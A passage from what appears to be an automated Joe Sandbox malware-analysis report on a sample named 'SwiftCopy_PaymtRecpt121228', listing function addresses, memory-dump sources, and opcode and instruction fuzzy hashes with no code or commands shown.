                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: b5728ace02a8e9e42c8905d4ac79be4aab759a288a4331025a36c589985b13ba
                                                    • Instruction ID: 0dcb2f3c499e6cb30e50ed7a2d483653e9c87f5313e7ec69e736cae6726778d2
                                                    • Opcode Fuzzy Hash: b5728ace02a8e9e42c8905d4ac79be4aab759a288a4331025a36c589985b13ba
                                                    • Instruction Fuzzy Hash: 183189347042048FCB25DF28C494DA97BFAAF89725B1501AAE952DB3B1DB31EC05CBA1
                                                    Function 05A503B9 Relevance: .1, Instructions: 102COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2072579411.0000000005A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A50000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_5a50000_SwiftCopy_PaymtRecpt121228.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 8ce2421d5c95ffdfeafda4071506070b5b9da57d60a8d1e97e0b604511df4abf
                                                    • Instruction ID: eb2352bd9125db488aa2cdc9da41293e3477940055de1d32667135c62be10f84
                                                    • Opcode Fuzzy Hash: 8ce2421d5c95ffdfeafda4071506070b5b9da57d60a8d1e97e0b604511df4abf
                                                    • Instruction Fuzzy Hash: 27413771610B058FDB35CF28D44AF6ABBF2FB45320F144E29EAAAC7610D774E8458B91
                                                    Function 05A5C664 Relevance: .1, Instructions: 94COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2072579411.0000000005A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A50000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_5a50000_SwiftCopy_PaymtRecpt121228.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: c340176db6c784a3dc523cd780a8c1ebb92128f4168c48df1d0bddd11cbcdf28
                                                    • Instruction ID: afa620d972bb55372ab60303065f67e694443695655c645aca95a3ad9043486a
                                                    • Opcode Fuzzy Hash: c340176db6c784a3dc523cd780a8c1ebb92128f4168c48df1d0bddd11cbcdf28
                                                    • Instruction Fuzzy Hash: 5831D171604200CBCB29DF28D885EAA7F72FF91314F24897CE8569B345C736DA5AC792
                                                    Function 05A5DE29 Relevance: .1, Instructions: 91COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2072579411.0000000005A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A50000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_5a50000_SwiftCopy_PaymtRecpt121228.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 228b7b7b07d6ceb1917b4ccd26bec8c1a6f8d7a12aa6a018b00537d880612403
                                                    • Instruction ID: 981dff968e82a22055b4ca4f5cc80dbae9d31458b313963e100928a1bd749ce2
                                                    • Opcode Fuzzy Hash: 228b7b7b07d6ceb1917b4ccd26bec8c1a6f8d7a12aa6a018b00537d880612403
                                                    • Instruction Fuzzy Hash: AB310171608300CFC71ADF28D885D9D7F71FF91314B28886DE8969B242D735CA5AC7A1
                                                    Function 05A54CC8 Relevance: .1, Instructions: 86COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2072579411.0000000005A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A50000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_5a50000_SwiftCopy_PaymtRecpt121228.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 1b9b64caf6284b72f40ec55bae0b10b49b697ebb13de900bf1d3780d25bd864c
                                                    • Instruction ID: e95db4eda33debf200d24d76f4113a8f535ec246ff14bd9816d4d4c583784c48
                                                    • Opcode Fuzzy Hash: 1b9b64caf6284b72f40ec55bae0b10b49b697ebb13de900bf1d3780d25bd864c
                                                    • Instruction Fuzzy Hash: 06214C367146108FCF19EB69E454D6E37EAAF8866571540AAED06CB360EE31DC41CBA0
                                                    Function 05A59BD8 Relevance: .1, Instructions: 85COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2072579411.0000000005A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A50000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_5a50000_SwiftCopy_PaymtRecpt121228.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: da3292c60443eae4238968beb7f4bf942efa6ab43de2299e2208f3bd379e9562
                                                    • Instruction ID: 63be5725ffa8ea3a8bad3f3dd1af7735935a7808247ac3867d7a4788c4ee66dc
                                                    • Opcode Fuzzy Hash: da3292c60443eae4238968beb7f4bf942efa6ab43de2299e2208f3bd379e9562
                                                    • Instruction Fuzzy Hash: BE2124767042108FEB248B69C881DBF77E7FBC4320B288069E54797395C634F981C7A1
                                                    Function 05A51240 Relevance: .1, Instructions: 84COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2072579411.0000000005A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A50000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_5a50000_SwiftCopy_PaymtRecpt121228.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 60b71887b131db192b5c21d27d36d8273c3efe3cbf0666b85768648580ee533f
                                                    • Instruction ID: 2bbb390b204379f7cdafc17cb690ce487b36a9b248a64d67bf66c56e6b34556b
                                                    • Opcode Fuzzy Hash: 60b71887b131db192b5c21d27d36d8273c3efe3cbf0666b85768648580ee533f
                                                    • Instruction Fuzzy Hash: 6F310539A20219DFCB04DFA9D894EADB7B6FF88710F5181A9E915EB320C730A800CF50
                                                    Function 05A59BE8 Relevance: .1, Instructions: 79COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2072579411.0000000005A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A50000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_5a50000_SwiftCopy_PaymtRecpt121228.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: b1052c8054584f3c0b03716da859c61ace6917e76791c276efb9ff6ff3340be3
                                                    • Instruction ID: 7a99abe4997ce501b92f7e2d721dfa3eab14ad3a40089c524a1590306eae774e
                                                    • Opcode Fuzzy Hash: b1052c8054584f3c0b03716da859c61ace6917e76791c276efb9ff6ff3340be3
                                                    • Instruction Fuzzy Hash: B321FF767006108FEB248B25C881DBF77E6FBC4221B288029E95797394CA38E981C7A1
                                                    Function 05A503C8 Relevance: .1, Instructions: 76COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2072579411.0000000005A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A50000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_5a50000_SwiftCopy_PaymtRecpt121228.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 5d134786ec2fc9de8808b07cb837f19d410468dc73adae67ab16c6a1991cc8d3
                                                    • Instruction ID: d55c98a449f2358022e59f27978490d0001213a6cbc7cf55819cfde5852e8b9a
                                                    • Opcode Fuzzy Hash: 5d134786ec2fc9de8808b07cb837f19d410468dc73adae67ab16c6a1991cc8d3
                                                    • Instruction Fuzzy Hash: C721C671610B049BD735DF38D48AF66B7F6FB45320F040E29EAAACB600D774E8458B91
                                                    Function 05A5F541 Relevance: .1, Instructions: 74COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2072579411.0000000005A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A50000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_5a50000_SwiftCopy_PaymtRecpt121228.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: f9a457bd1be36bdcdf3dd636b076d12e2fda464897efcb8d38c43024abe127a1
                                                    • Instruction ID: ff99f2c91de5c6f056f1eea39d0f4451f2350c463fb9e57a2d48fc3de23b1d5e
                                                    • Opcode Fuzzy Hash: f9a457bd1be36bdcdf3dd636b076d12e2fda464897efcb8d38c43024abe127a1
                                                    • Instruction Fuzzy Hash: CE21CF367003018FC7259F69E444F2AB7E6FFC8221B10C46EEA9ACB311DA71EC418B91
                                                    Function 05A5F607 Relevance: .1, Instructions: 74COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2072579411.0000000005A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A50000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_5a50000_SwiftCopy_PaymtRecpt121228.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: edde9651bd4d02baf24e7404c99986ced935d04ed9802bfb346cd81b9f73a409
                                                    • Instruction ID: df1f15b261827d3dbd61036bc58a9c3e65b85f065e15b5fee7c9d1cce8bd2e51
                                                    • Opcode Fuzzy Hash: edde9651bd4d02baf24e7404c99986ced935d04ed9802bfb346cd81b9f73a409
                                                    • Instruction Fuzzy Hash: 5D2192F2D04609CFCB027FA8E55A4BEFF75FF41221F010955D5C5A2495EE3108A98B91
                                                    Function 05A523B8 Relevance: .1, Instructions: 73COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2072579411.0000000005A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A50000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_5a50000_SwiftCopy_PaymtRecpt121228.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 83888b5f3fe5714dbc78e7474351b01b1e5481919e37a26ea1b092d5e380f205
                                                    • Instruction ID: b3517490c48a1b4854dbc945420bed74c1002c2eb3b55d6106bed470db29eac6
                                                    • Opcode Fuzzy Hash: 83888b5f3fe5714dbc78e7474351b01b1e5481919e37a26ea1b092d5e380f205
                                                    • Instruction Fuzzy Hash: 53217C343012108FCB29DB29D454E6A73FAEF85724B1080AEE906CB3B5DB75EC46CB51
                                                    Function 05A523C8 Relevance: .1, Instructions: 72COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2072579411.0000000005A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A50000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_5a50000_SwiftCopy_PaymtRecpt121228.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 69a6b2b014e38735862937fa4eb5c38ff30f64bce174c3d16a2878b89baf622f
                                                    • Instruction ID: b272d91fa01a0ad0aa924779b180879d20456e04a606fd06c75dc197d41c1dc0
                                                    • Opcode Fuzzy Hash: 69a6b2b014e38735862937fa4eb5c38ff30f64bce174c3d16a2878b89baf622f
                                                    • Instruction Fuzzy Hash: 19214C343112108FCB19DB29D454E6973EAEF85724B50846DEA06CB365DB75EC46CB50
                                                    Function 05A5D310 Relevance: .1, Instructions: 72COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2072579411.0000000005A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A50000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_5a50000_SwiftCopy_PaymtRecpt121228.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: b15394d2630e22a028d5acf51177abe60d71c9caff4845be435d97681db6d7ac
                                                    • Instruction ID: f89f00aa6ce951754a2685b92b061cf2478e4e63d4f02ce83845e1ff557cbb02
                                                    • Opcode Fuzzy Hash: b15394d2630e22a028d5acf51177abe60d71c9caff4845be435d97681db6d7ac
                                                    • Instruction Fuzzy Hash: 1721B331D04209CBDB14DF68D418BEEBBB2FF88321F14C529E95677240DB759A49CBA0
                                                    Function 05A50E44 Relevance: .1, Instructions: 72COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2072579411.0000000005A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A50000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_5a50000_SwiftCopy_PaymtRecpt121228.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 5bc94089ff9393b18c38465b5ed86c9fea159fc75f552c4bf43b6a10fd935748
                                                    • Instruction ID: 2a1e0bbce6eb421904906e3e0418166dfe226207910f7afe956075c5e8761fb9
                                                    • Opcode Fuzzy Hash: 5bc94089ff9393b18c38465b5ed86c9fea159fc75f552c4bf43b6a10fd935748
                                                    • Instruction Fuzzy Hash: 8B2138397006109FCB24DF19E984F6AB3AAFF88720B15842EEA5697750DB71F841CB50
                                                    Function 009DD1B4 Relevance: .1, Instructions: 72COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2065857846.00000000009DD000.00000040.00000800.00020000.00000000.sdmp, Offset: 009DD000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_9dd000_SwiftCopy_PaymtRecpt121228.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 036b1d6aec51224ab0b4febb74e29fb23e1002fe73acb13672c80ac07515e731
                                                    • Instruction ID: 090f41ca6b5adbeb8d2d8821dd09b4960707134f5ee7f93a54aa1fba77c130a9
                                                    • Opcode Fuzzy Hash: 036b1d6aec51224ab0b4febb74e29fb23e1002fe73acb13672c80ac07515e731
                                                    • Instruction Fuzzy Hash: 7E21F2715853049FCB05DF64C9C0F26BB69FB94314F20C96EEA594B356C33AD846CAA1
                                                    Function 009DD36C Relevance: .1, Instructions: 72COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2065857846.00000000009DD000.00000040.00000800.00020000.00000000.sdmp, Offset: 009DD000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_9dd000_SwiftCopy_PaymtRecpt121228.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 69002a8dd4eb1276f66f976c6f4a23ba52ecd9ad9028184f890245604f685707
                                                    • Instruction ID: b7d5657ac483341d4bc85b13cfd0ed0ba1c57f79be1d8d65489b2959007b3d45
                                                    • Opcode Fuzzy Hash: 69002a8dd4eb1276f66f976c6f4a23ba52ecd9ad9028184f890245604f685707
                                                    • Instruction Fuzzy Hash: 29210771585204DFCB05DF24D9C4B26FF69FB84318F24C96EE9094B3A6C37AD846CA62
                                                    Function 05A52EC8 Relevance: .1, Instructions: 71COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2072579411.0000000005A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A50000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_5a50000_SwiftCopy_PaymtRecpt121228.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 8a266b48c34a11d1ec78be9ec40a6f80e050eb0c23bd4c62e7e96bcbb5022a9e
                                                    • Instruction ID: e651964708fe3ed8112d620948ecc940e41ffaeeeb3ce4282faebc0f0cd3c083
                                                    • Opcode Fuzzy Hash: 8a266b48c34a11d1ec78be9ec40a6f80e050eb0c23bd4c62e7e96bcbb5022a9e
                                                    • Instruction Fuzzy Hash: 45212C75E002099FCF05DFA9D8409EDFBB6FF8C311B14826AE918A7210E731A955CB90
                                                    Function 05A5EAFC Relevance: .1, Instructions: 70COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2072579411.0000000005A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A50000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_5a50000_SwiftCopy_PaymtRecpt121228.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 268509ec9cb93cd932bbef0d5a821f5773e5e29794d2f1120b9e67e6f4fed225
                                                    • Instruction ID: 7c5d8c8df9b86462fc0fdd5c6ee2db336a42d4b21ffb4f50fef3ac9fc1520a68
                                                    • Opcode Fuzzy Hash: 268509ec9cb93cd932bbef0d5a821f5773e5e29794d2f1120b9e67e6f4fed225
                                                    • Instruction Fuzzy Hash: E72171F1D106099ECB017BA9E59A87FFF39FF41311F010955E585A2094EE3148AD8BD5
                                                    Function 05A52EB8 Relevance: .1, Instructions: 68COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2072579411.0000000005A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A50000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_5a50000_SwiftCopy_PaymtRecpt121228.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: c6187b17cd50143eb26cbf4c38028269d46384369ee2db1669c326a44316e4ee
                                                    • Instruction ID: 9733e8907a90b8ab6925f5a2ab52b3b349e7b12c097f16efac0e824debd00dce
                                                    • Opcode Fuzzy Hash: c6187b17cd50143eb26cbf4c38028269d46384369ee2db1669c326a44316e4ee
                                                    • Instruction Fuzzy Hash: 47212875E002199FCF05DFA9D840ADDFBB6FF4C310F14826AE914A7250E731A995CB90
                                                    Function 05A56A74 Relevance: .1, Instructions: 68COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2072579411.0000000005A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A50000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_5a50000_SwiftCopy_PaymtRecpt121228.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 3378a7b12ad8d6ab966dfe0d79ef41630f47136fd14571980f064a9dec063170
                                                    • Instruction ID: 72d49eb8c439e34c061e0636d3216cbe008d076650465e5bde366fc3add8cdd7
                                                    • Opcode Fuzzy Hash: 3378a7b12ad8d6ab966dfe0d79ef41630f47136fd14571980f064a9dec063170
                                                    • Instruction Fuzzy Hash: F131E0B0D013189FDB20DF99C989B9EBFF5BB48714F64841AE404BB290C7B59845CFA5
                                                    Function 05A5530C Relevance: .1, Instructions: 67COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2072579411.0000000005A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A50000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_5a50000_SwiftCopy_PaymtRecpt121228.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 720792dc581031d5fd2a357c715f14a591b066f0e393226a6e48c58f025b27cb
                                                    • Instruction ID: 67428166fc6015843a563b340a935101e8edfa592d7c643c48922f3594ef0f98
                                                    • Opcode Fuzzy Hash: 720792dc581031d5fd2a357c715f14a591b066f0e393226a6e48c58f025b27cb
                                                    • Instruction Fuzzy Hash: DC31C0B0D013189FDB20DF99C988B9EBFF5BB08724F64841AE805BB240C7B55845CF94
                                                    Function 05A5CDE9 Relevance: .1, Instructions: 67COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2072579411.0000000005A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A50000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_5a50000_SwiftCopy_PaymtRecpt121228.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: ab9c2d67683f374ab8d5b99e6e0eebbdc50b379e1e6be6ae813cae41aea9f9dc
                                                    • Instruction ID: b483f80baeff203ea4b53a0fc50cfde4d0f6f74c6075e4e788ced13da70c2e8e
                                                    • Opcode Fuzzy Hash: ab9c2d67683f374ab8d5b99e6e0eebbdc50b379e1e6be6ae813cae41aea9f9dc
                                                    • Instruction Fuzzy Hash: 64117F357106108FC705AB7CD894E6E7BEAFF89220B1545AAE986C7361DF309D05CBA0
                                                    Function 05A54E40 Relevance: .1, Instructions: 67COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2072579411.0000000005A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A50000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_5a50000_SwiftCopy_PaymtRecpt121228.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 93ab2f9b88cb383e486d7152852dba33c0bd2c5c08ed268d1cfcb456a0dd19f1
                                                    • Instruction ID: 6301d2355f6c7bb52652a5634f5eaa1db9ef4af542c3bac17a77e9c93145922d
                                                    • Opcode Fuzzy Hash: 93ab2f9b88cb383e486d7152852dba33c0bd2c5c08ed268d1cfcb456a0dd19f1
                                                    • Instruction Fuzzy Hash: 02213C31A002189FCF04EB68D898EED77B2FF8C310F514468E802AB3A0CB399C45CB65
                                                    Function 05A529D0 Relevance: .1, Instructions: 65COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2072579411.0000000005A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A50000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_5a50000_SwiftCopy_PaymtRecpt121228.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 57302648bf08dbbbdb13f737cc4e1a0f1b96c137a861abed0cc10c882fd315d6
                                                    • Instruction ID: aa3acdda426164dd0d5c272205589758cc2a56e02dc2f584d802012776e35b2f
                                                    • Opcode Fuzzy Hash: 57302648bf08dbbbdb13f737cc4e1a0f1b96c137a861abed0cc10c882fd315d6
                                                    • Instruction Fuzzy Hash: A12167797006109FCB25CF19E884F6AB3B6BF88620F15802EEA5687760D731F841CB50
                                                    Function 05A53388 Relevance: .1, Instructions: 64COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2072579411.0000000005A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A50000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_5a50000_SwiftCopy_PaymtRecpt121228.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 4914511084a5f360d8376fafabe32d1533c68ba6235d93a402eefbd2fe1eed47
                                                    • Instruction ID: a75ddb308686187ecd9fcc51ae8af07aa8cc1c05839ff5de4f1d83b9b2664eb5
                                                    • Opcode Fuzzy Hash: 4914511084a5f360d8376fafabe32d1533c68ba6235d93a402eefbd2fe1eed47
                                                    • Instruction Fuzzy Hash: 7F21E971E0021A9FCB44DFADC8449AEFBF9FF98200B10851AE518E7215E7709946CB90
                                                    Function 05A58E08 Relevance: .1, Instructions: 63COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2072579411.0000000005A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A50000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_5a50000_SwiftCopy_PaymtRecpt121228.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 6b603d6f89d1f789aa88d0e9c8a21e8afef82a6da56aa76e94ec62eb2ed56c41
                                                    • Instruction ID: 06af12ba03284e4c560a2c814a66d0e6f6172e34ee35ef36f2e0ea367e95ab8c
                                                    • Opcode Fuzzy Hash: 6b603d6f89d1f789aa88d0e9c8a21e8afef82a6da56aa76e94ec62eb2ed56c41
                                                    • Instruction Fuzzy Hash: B321F0B5E002198FCB05DFA8D885AEEBBF1FF48321F10816AE814A7350D734A945CFA1
                                                    Function 05A5CDF8 Relevance: .1, Instructions: 61COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2072579411.0000000005A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A50000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_5a50000_SwiftCopy_PaymtRecpt121228.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 426fc1df8c0a60706ac304137cd92d8bf2dd3d0a1753a85767ab8918f5a35532
                                                    • Instruction ID: b519356f3a2be78a2ef228792013f1f6092e9f96fd005a21af326a4d7f84cf68
                                                    • Opcode Fuzzy Hash: 426fc1df8c0a60706ac304137cd92d8bf2dd3d0a1753a85767ab8918f5a35532
                                                    • Instruction Fuzzy Hash: 49114F357106109FC714EB7CD858E6E77EAFF89620B14456AE906D7360DF719D01CB90
                                                    Function 05A54E50 Relevance: .1, Instructions: 61COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2072579411.0000000005A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A50000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_5a50000_SwiftCopy_PaymtRecpt121228.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 4ee7923d9cf5e2357142454bfb98087a3f6a6440d5948f3cae231c1ae462a1d4
                                                    • Instruction ID: de6b7d702ac57987fea3f1c1a6cd8b49e32ced286cc673fdedf7811465f586ff
                                                    • Opcode Fuzzy Hash: 4ee7923d9cf5e2357142454bfb98087a3f6a6440d5948f3cae231c1ae462a1d4
                                                    • Instruction Fuzzy Hash: 0721F935A002189FCF08EB68D958EED77B2FF8C314F114468E802AB3A0CB399C45CB65
                                                    Function 05A568BF Relevance: .1, Instructions: 60COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2072579411.0000000005A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A50000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_5a50000_SwiftCopy_PaymtRecpt121228.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 430a0c94019242d81986681416148971e751109ab8000c25b4eb89ffb78c7ac0
                                                    • Instruction ID: dbc433c5e7ed6b5d989ecd8056161962c3180d79d83da1b20001d58f9ff2636d
                                                    • Opcode Fuzzy Hash: 430a0c94019242d81986681416148971e751109ab8000c25b4eb89ffb78c7ac0
                                                    • Instruction Fuzzy Hash: 89119171A002155B8B20DF699849EBFB7FBFFC8260B544528E829DB340EF70990187A1
                                                    Function 05A51428 Relevance: .1, Instructions: 59COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2072579411.0000000005A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A50000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_5a50000_SwiftCopy_PaymtRecpt121228.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: bb201ebd40a6a8e6239a81f7c27333709063c9f9e0c99cdedac2377cb158a972
                                                    • Instruction ID: 8ea3c3afec55cdf41e713c77cba6b0e440a3e1e1105eec1db3c844df2a1de6b2
                                                    • Opcode Fuzzy Hash: bb201ebd40a6a8e6239a81f7c27333709063c9f9e0c99cdedac2377cb158a972
                                                    • Instruction Fuzzy Hash: D8116F363053455FCB125BA89844F7F3FBA9F85210F18806BF949CB182CA79C847C3A1
                                                    Function 05A5A131 Relevance: .1, Instructions: 59COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2072579411.0000000005A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A50000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_5a50000_SwiftCopy_PaymtRecpt121228.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 92869b906f80b443c8375fab7607d0436586454a060cd93f0ff0b9b8d3fdf120
                                                    • Instruction ID: 13617f2ae11a30cbca62e23ae29a68c4dea9628509b4a3bdb273865a56d5fcd3
